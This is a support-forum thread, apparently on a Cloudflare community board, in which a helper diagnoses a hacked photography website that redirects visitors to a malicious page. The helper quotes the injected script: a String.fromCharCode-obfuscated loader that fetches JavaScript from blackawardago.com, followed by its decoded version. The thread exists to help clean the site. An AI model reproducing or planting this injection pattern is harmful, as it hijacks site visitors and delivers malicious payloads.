Redirecting to malicious page on all devices

My website loads for 2 seconds and then redirects to a malicious page. I have spoken with my hosting provider, ISP and Domain host and they have all said a traceroute shows the final redirect is going to cloudflare and I need to contact cloudflare to find out why.
This is happening on every device, browser and network I try and has only started within the last 12 hours.
Here is a screenshot of the page.

1 Like

Take your domain and content and run as fast as you can away from that host. They obviously dont know what Cloudflare is and how it functions. Any semi-competent host should know this these days however.

Unless you configured a dedicated redirect via page rule (which is very unlikely and the two seconds would further reject that idea) that redirect comes straight from your server. Your site most likely got compromised and you will need to clean it. For this I’d refer you to something like StackExchange.

To confirm however that it is not Cloudflare related, can you post your domain?

1 Like

Hi Sandro, I appreciate the input. The site is nisekophotography.com
I do a full backup of the site weekly so I am not too worried about the content, just want to remove the redirect and get back to normal.

1 Like

Yep, that comes straight from your server via JavaScript.

Are you using something from blackawardago.com? Your site includes a JavaScript file from there which might be responsible for these redirects.

I have no idea what blackwardago.com is. I just ran a wordfence scan ind it returned 2 malicious files within my site. Both are labeled malicious content and critical. I ahve attached screenshot below.

In that case you might want to remove that link and, yes, these two entries are probably related. But as I mentioned initially you might want to take that to StackExchange or another appropriate forum.

Chhers, I appreciate the help and will follow your suggestion.

Just a quick follow up, on line 70 in your main document you have the following code

<script type="9a2268c39b75b57a3d57e54d-text/javascript">eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

which translates to

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}"

and inserts the JavaScript code which eventually performs the redirect. Removing that line should fix it for the time being but you should definitely investigate this more thoroughly.

1 Like

Thanks, that helps a lot. Would a full deletion and reinstall from backup be the simplest solution? Provided I change my access codes etc.

Only if you can guarantee the backup was not already compromised.

The site backups weekly so I should have a clean version in there somewhere. Since this has only appeared in the last 48hours I would assume it was compromised not too long ago

Just make sure you audit the entire setup. If you dont know how it got compromised it could happen again at any moment.

1 Like

I understand. Thanks Sandro I appreciate your help and insight. I have an idea how it was compromised and it fits with the timeline. I recently setup an new add-on domain and due to an emergency didn’t finish the complete installation with security until I guess it was too late. I think this could have allowed access to my main site.

This topic was automatically closed after 30 days. New replies are no longer allowed.